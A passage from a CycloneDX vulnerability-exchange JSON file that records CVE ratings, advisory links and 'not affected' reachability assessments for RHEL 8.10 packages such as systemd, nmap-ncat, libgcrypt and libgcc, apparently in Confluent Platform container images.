              "version": "239-82.el8_10.17",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2018-25282",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        674
      ],
      "description": "Nmap 7.70 contains a denial of service vulnerability that allows local attackers to crash the application by processing malicious XML files with exponential entity expansion. Attackers can create a crafted XML file with nested entity definitions and open it through ZenMap's scan import functionality to cause the program to consume excessive system resources and crash.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2018-25282"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2018-25282"
        },
        {
          "url": "https://nmap.org/dist/nmap-7.70-setup.exe"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-25282"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2018-25282"
        },
        {
          "url": "https://www.exploit-db.com/exploits/45357"
        },
        {
          "url": "https://www.vulncheck.com/advisories/nmap-denial-of-service-via-xml-entity-expansion"
        }
      ],
      "published": "2026-04-26T22:17:28+00:00",
      "updated": "2026-06-17T01:55:09+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2",
          "versions": [
            {
              "version": "2:7.92-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/nmap-ncat@7.92-2.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2019-12904",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
        }
      ],
      "cwes": [
        668
      ],
      "description": "In Libgcrypt 1.8.4, the C implementation of AES is vulnerable to a flush-and-reload side-channel attack because physical addresses are available to other processes. (The C implementation is used on platforms where an assembly-language implementation is unavailable.) NOTE: the vendor's position is that the issue report cannot be validated because there is no description of an attack",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2019-12904"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00049.html"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2019-12904"
        },
        {
          "url": "https://dev.gnupg.org/T4541"
        },
        {
          "url": "https://github.com/gpg/libgcrypt/commit/a4c561aab1014c3630bc88faf6f5246fee16b020"
        },
        {
          "url": "https://github.com/gpg/libgcrypt/commit/daedbbb5541cd8ecda1459d3b843ea4d92788762"
        },
        {
          "url": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E"
        },
        {
          "url": "https://lists.gnupg.org/pipermail/gcrypt-devel/2019-July/004760.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12904"
        },
        {
          "url": "https://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-12904.html"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2019-12904"
        }
      ],
      "published": "2019-06-20T00:15:10+00:00",
      "updated": "2026-06-17T02:15:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.8.5-7.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2019-14250",
      "ratings": [
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        190,
        787
      ],
      "description": "An issue was discovered in GNU libiberty, as distributed in GNU Binutils 2.32. simple_object_elf_match in simple-object-elf.c does not check for a zero shstrndx value, leading to an integer overflow and resultant heap-based buffer overflow.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2019-14250"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00078.html"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00004.html"
        },
        {
          "url": "http://www.securityfocus.com/bid/109354"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2019-14250"
        },
        {
          "url": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=90924"
        },
        {
          "url": "https://gcc.gnu.org/ml/gcc-patches/2019-07/msg01003.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-14250"
        },
        {
          "url": "https://security.gentoo.org/glsa/202007-39"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20190822-0002/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-4326-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-4336-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-4336-2"
        },
        {
          "url": "https://usn.ubuntu.com/4326-1/"
        },
        {
          "url": "https://usn.ubuntu.com/4336-1/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2019-14250"
        }
      ],
      "published": "2019-07-24T04:15:12+00:00",
      "updated": "2026-06-17T02:18:02+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "8.5.0-28.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "8.5.0-28.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
